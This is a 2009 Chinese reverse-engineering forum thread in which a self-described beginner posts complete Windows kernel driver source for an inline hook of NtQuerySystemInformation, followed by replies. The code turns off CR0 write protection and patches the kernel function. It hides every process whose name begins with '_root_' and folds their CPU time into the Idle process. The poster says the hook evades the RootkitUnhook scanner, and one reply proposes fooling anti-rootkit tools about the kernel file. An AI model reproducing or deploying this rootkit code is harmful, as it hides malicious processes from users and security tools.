首页
社区
课程
招聘
[原创]菜鸟理解的inlineHook的要点(RootkitUnhook无法检测)
发表于: 2009-11-23 21:22 10701

[原创]菜鸟理解的inlineHook的要点(RootkitUnhook无法检测)

2009-11-23 21:22
10701

//菜鸟刚刚理解到inlineHook的要点,贴出来希望和我一样的人多交流一下
//作者:钱大宝

//inLineHook NtQuerySystemInformation函数
//演示对要Hook的函数两种处理,调用原函数前和调用原函数后
//不知道为什么RootkitUnhook无法检测到

#include "ntddk.h"

//存放原函数的前10字节
unsigned char orig_code[10] = {0x90, 0x90, 0x90, 0x90, 0x90,0x90, 0x90, 0x90, 0x90, 0x90};
//存放跳转到我们自己函数的指令,用于修改原函数的前10个字节
unsigned char hook_code[10] = {0xe9, 0, 0, 0, 0,0x90,0x90,0x90,0x90,0x90};
//存放跳转到原起始地址后5字节的段内跳指令
unsigned char jmp_org_code[5] = {0xe9, 0, 0, 0, 0};
//保存原函数的地址
ULONG OldFuncAddr;
ULONG CR0VALUE;
//原函数执行完的返回地址(用全局保存是为了不在我们自己的函数内去平衡堆栈)
ULONG adrOrgRet;
//我们自己的NtQuerySystemInformation函数用到的参数
ULONG g_SystemInformationClass;
PVOID g_SystemInformation;
ULONG g_SystemInformationLength;
PULONG g_ReturnLength;
NTSTATUS g_ntStatus;

//我们自己的NtQuerySystemInformation用到的时间变量
LARGE_INTEGER g_UserTime;
LARGE_INTEGER g_KernelTime;

//这里直接借用windows内核安全防护一书
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
        unsigned int *ServiceTableBase;
        unsigned int *ServiceCounterTableBase; //Used only in checked build
        unsigned int NumberOfServices;
        unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport)  ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function)  KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

struct _SYSTEM_THREADS
{
        LARGE_INTEGER           KernelTime;
        LARGE_INTEGER           UserTime;
        LARGE_INTEGER           CreateTime;
        ULONG                           WaitTime;
        PVOID                           StartAddress;
        CLIENT_ID                       ClientIs;
        KPRIORITY                       Priority;
        KPRIORITY                       BasePriority;
        ULONG                           ContextSwitchCount;
        ULONG                           ThreadState;
        KWAIT_REASON            WaitReason;
};

struct _SYSTEM_PROCESSES
{
        ULONG                           NextEntryDelta;
        ULONG                           ThreadCount;
        ULONG                           Reserved[6];
        LARGE_INTEGER           CreateTime;
        LARGE_INTEGER           UserTime;
        LARGE_INTEGER           KernelTime;
        UNICODE_STRING          ProcessName;
        KPRIORITY                       BasePriority;
        ULONG                           ProcessId;
        ULONG                           InheritedFromProcessId;
        ULONG                           HandleCount;
        ULONG                           Reserved2[2];
        VM_COUNTERS                     VmCounters;
        IO_COUNTERS                     IoCounters; //windows 2000 only
        struct _SYSTEM_THREADS          Threads[1];
};

// Added by Creative of rootkit.com
struct _SYSTEM_PROCESSOR_TIMES
{
                LARGE_INTEGER                                        IdleTime;
                LARGE_INTEGER                                        KernelTime;
                LARGE_INTEGER                                        UserTime;
                LARGE_INTEGER                                        DpcTime;
                LARGE_INTEGER                                        InterruptTime;
                ULONG                                                        InterruptCount;
};
NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
                        IN PVOID SystemInformation,
                        IN ULONG SystemInformationLength,
                        OUT PULONG ReturnLength);

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
            ULONG SystemInformationCLass,
                        PVOID SystemInformation,
                        ULONG SystemInformationLength,
                        PULONG ReturnLength
);

///////////////////////////////////////////////////////////////////////
// ResoleLogic function
//这里直接借用windows内核安全防护一书函数,隐藏_root_开头的所有进程
// ResoleLogic() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process who's name begins with "_root_".
ULONG ResoleLogic(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{

      // Asking for a file and directory listing
      if(SystemInformationClass == 5)
      {
             // This is a query for the process list.
                 // Look for process names that start with
                 // '_root_' and filter them out.
                                       
                 struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
         struct _SYSTEM_PROCESSES *prev = NULL;
                 
                 while(curr)
                 {
            //DbgPrint("Current item is %x\n", curr);
                        if (curr->ProcessName.Buffer != NULL)
                        {
                                if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
                                {
                                        g_UserTime.QuadPart += curr->UserTime.QuadPart;
                                        g_KernelTime.QuadPart += curr->KernelTime.QuadPart;

                                        if(prev) // Middle or Last entry
                                        {
                                                if(curr->NextEntryDelta)
                                                        prev->NextEntryDelta += curr->NextEntryDelta;
                                                else        // we are last, so make prev the end
                                                        prev->NextEntryDelta = 0;
                                        }
                                        else
                                        {
                                                if(curr->NextEntryDelta)
                                                {
                                                        // we are first in the list, so move it forward
                                                        (char *)SystemInformation += curr->NextEntryDelta;
                                                }
                                                else // we are the only process!
                                                        SystemInformation = NULL;
                                        }
                                }
                        }
                        else // This is the entry for the Idle process
                        {
                           // Add the kernel and user times of _root_*
                           // processes to the Idle process.
                           curr->UserTime.QuadPart += g_UserTime.QuadPart;
                           curr->KernelTime.QuadPart += g_KernelTime.QuadPart;

                           // Reset the timers for next time we filter
                           g_UserTime.QuadPart = g_KernelTime.QuadPart = 0;
                        }
                        prev = curr;
                    if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
                    else curr = NULL;
             }
          }
          else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
          {
         struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
         times->IdleTime.QuadPart += g_UserTime.QuadPart + g_KernelTime.QuadPart;
          }

          return 1;
}

VOID WPOFF()
{
        _asm
               
        {
               
                push eax
                        
                        mov eax, cr0
                        
                        mov CR0VALUE, eax
                        
                        and eax, 0fffeffffh  
                        
                        mov cr0, eax
                        
                        pop eax
                        cli
                        
        };
        
}

VOID WPON()
{
    __asm
               
        {      
                sti
                push eax
                        
                        mov eax, CR0VALUE
                        
                        mov cr0, eax
                        
                        pop eax
                        
        };
}

__declspec(naked) int jmp_back()
{
        __asm
        {
        _emit 0x90        //原函数前10个字节
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90

        _emit 0x90        //跳转回原函数+10
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90

        }
}
#if 0
//调用原函数前先处理
__declspec(naked) NTSTATUS NewZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{

        //原函数参数弹入我们的变量
        __asm
        {
                pop SystemInformationClass
                pop SystemInformation
                pop SystemInformationLength
                pop ReturnLength
        }

        DbgPrint("NewZwQuerySystemInformation\n");
        //ResoleLogic(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);////可以加入函数过程

        __asm
        {
                //压栈过程
                push ReturnLength
                push SystemInformationLength
                push SystemInformation
                push SystemInformationClass
                //转到跳转函数,跳转到原函数中
                jmp jmp_back;
                ret;
        }

   //return STATUS_SUCCESS;
}

#else
//调用原函数后再处理
__declspec(naked) NTSTATUS NewZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{
        ULONG t1;

       
        //保存参数给我们自己的函数使用,因为经过原函数后
        //堆栈已经被平衡过,所以不能再使用(这是我自己这样理解的,不一定正确)
        //这里用全局保存参数是为了自己不用实现堆栈帧和平衡堆栈(在这里做太麻烦,易出错)
        __asm
        {
                mov eax,dword ptr [esp+4]
                mov g_SystemInformationClass,eax
                mov eax,dword ptr [esp+8h]
                mov g_SystemInformation,eax
                mov eax,dword ptr [esp+0Ch]
                mov g_SystemInformationLength,eax
                mov eax,dword ptr [esp+10h]
                mov g_ReturnLength,eax
        }

        __asm
        {
                pop adrOrgRet        //保存返回地址
                push offset s1//用s1的地址来替代原地址,让原函数执行完后能返回S1
                //执行jmp_back
                jmp jmp_back
                s1: nop
        }

        //保存原函数的返回值
        _asm push eax
       
        //全局保存原函数返回值(原因和上面一样)
        _asm mov g_ntStatus,eax
        DbgPrint("NewZwQuerySystemInformation\n");        
        if( NT_SUCCESS(g_ntStatus))       
                {
                        ResoleLogic(g_SystemInformationClass,g_SystemInformation,g_SystemInformationLength,g_ReturnLength);
                }

        _asm pop eax

        __asm
        {
                //将原返回地址压栈,以便返回正确的地址
                //mov eax, 0; eax为原函数的返回值
                push adrOrgRet
                ret;
        }
}
#endif

//从ZwQuerySystemInformation的第2,3,4,5个字节
//得到NtQuerySystemInformation函数的地址
ULONG getOldFunAddress()
{
        return (ULONG)(SYSTEMSERVICE(ZwQuerySystemInformation));
}

void hook()
{
        ULONG MyFuncAddr;//我们的函数
        ULONG jmp_backAddr;
    KIRQL Irql;
        //得到原函数地址,并保存
        OldFuncAddr = getOldFunAddress();

        //我们的函数地址
        MyFuncAddr =(ULONG)NewZwQuerySystemInformation;
        //由我们的函数跳转回原函数的一个辅助函数地址
        jmp_backAddr = (ULONG)jmp_back;

        //关闭页保护属性
        WPOFF();
        //提升IRQ LEVEL
    Irql = KeRaiseIrqlToDpcLevel();

        //计算跳转地址,从原函数跳转到我们自己函数的偏移
        *((ULONG*)(hook_code+1)) = (ULONG)MyFuncAddr - ((ULONG)OldFuncAddr + 5);

        //保存原函数的前10个字节(取消HOOK时还原),因为我们要用跳转指令覆盖前10字节
        memcpy(orig_code,(unsigned char *)OldFuncAddr, 10);

        //用我们的跳转指令覆盖原函数前10个字节
        memcpy((unsigned char*)OldFuncAddr, hook_code, 10);

        //计算返回地址,从我们的跳转函数到原函数的第11个字节处
        *((ULONG*)(jmp_org_code+1)) = ((ULONG)OldFuncAddr+10)  - ((ULONG)jmp_backAddr + 15);

        //复制原函数的前10字节到我们的跳转函数的前10字节,因为我们要在跳转回原函数前
        //执行原函数的前10字节
        memcpy((unsigned char *)jmp_backAddr, orig_code, 10);

        //复制5字节的跳转指令到我们的跳转函数,由它来跳转回原函数
        memcpy((unsigned char *)jmp_backAddr + 10, jmp_org_code, 5);

    //降低IRQL
    KeLowerIrql(Irql);
        //恢复写保护
        WPON();
}

void unHook()
{
        KIRQL Irql;
        OldFuncAddr = getOldFunAddress();
       
    WPOFF();
    Irql = KeRaiseIrqlToDpcLevel();
    //inline hook函数
    RtlCopyMemory ( (unsigned char*)OldFuncAddr, orig_code, 10);
    // 恢复写保护,降低IRQL
    KeLowerIrql(Irql);
    WPON();        

}
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
        unHook();
        DbgPrint("OnUnload called\n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
                                         IN PUNICODE_STRING theRegistryPath)
{
   g_UserTime.QuadPart = g_KernelTime.QuadPart = 0;

   theDriverObject->DriverUnload  = OnUnload;
   
   hook();
   return STATUS_SUCCESS;
}


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 7
支持
分享
最新回复 (15)
雪    币: 71
活跃值: (10)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
2
#if 0
//调用原函数前先处理
__declspec(naked) NTSTATUS NewZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{

  //原函数参数弹入我们的变量
  __asm
  {
    pop SystemInformationClass
    pop SystemInformation
    pop SystemInformationLength
    pop ReturnLength
  }

  DbgPrint("NewZwQuerySystemInformation\n");
  ResoleLogic(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);////可以加入函数过程

  __asm
  {
    //压栈过程
    push ReturnLength
    push SystemInformationLength
    push SystemInformation
    push SystemInformationClass
    //转到跳转函数,跳转到原函数中
    jmp jmp_back;
    ret;//这个Ret难道不多余吗?原来的返回不就是了吗??
  }

   //return STATUS_SUCCESS;
}

#else

这个Ret语句不该有吧???
2009-11-23 22:48
0
雪    币: 522
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
条件编译都出来了  强
nake函数里可以ret么...
2009-11-24 05:23
0
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
4
写得不好,另外nake函数可以retn,楼主那个地方是多余了
2009-11-24 10:51
0
雪    币: 38
活跃值: (11)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
5
确实这里不需要,没注意,谢谢大家提醒~~~
另外楼上兄弟能给点建议么?感谢。
2009-11-24 16:51
0
雪    币: 7651
活跃值: (523)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
6
没啥建议,加深理解就行了~
2009-11-24 18:25
0
雪    币: 362
活跃值: (25)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
7
去写驱动钩子库, 可以加深对内核钩子的理解. 硬编码毕竟只是照搬.并且通用性不好.
2009-11-24 18:38
0
雪    币: 34
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
8
RootkitUnhook无法检测到?
那工具检查的原理是什么?
2009-11-24 19:09
0
雪    币: 522
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
9
RootkitUnhook 好象不检测深层的HOOK  稍微钩深点 就不检测了
2009-11-25 01:02
0
雪    币: 71
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
10
呵呵,这个RKU肯定能检测啊
2009-11-25 09:50
0
雪    币: 38
活跃值: (11)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
11
兄弟,RKU确实检测不到,我测试过。
你可以编译测试一下
有谁知道RKU检测inlineHook的原理给大家伙讲讲吧。
2009-11-25 10:52
0
雪    币: 38
活跃值: (11)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
动钩子库是啥玩意儿??
2009-11-25 10:53
0
雪    币: 71
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
13
点codehooks,然后就看到了,不截图了,你自己看
2009-11-25 11:10
0
雪    币: 38
活跃值: (11)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
14
不明白点codehooks是啥意思??
2009-11-25 15:16
0
雪    币: 522
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
15
不明白...
又一个标题党   

RootkitUnhook 对INLINE HOOK的检测很简单  过不过都没意义
楼主寂寞的话应该以 冰刃 为目标

不过小弟倒觉得过inline hook的扫描 应该在ARK读原始内核文件时做手脚 让它认错内核文件
2009-11-25 19:35
0
雪    币: 284
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
很好,很强大。
楼主是强啊,什么驱动钩子库。这没听过
写个通用inline hook的不错
2009-11-27 10:07
0
游客
登录 | 注册 方可回帖
返回
//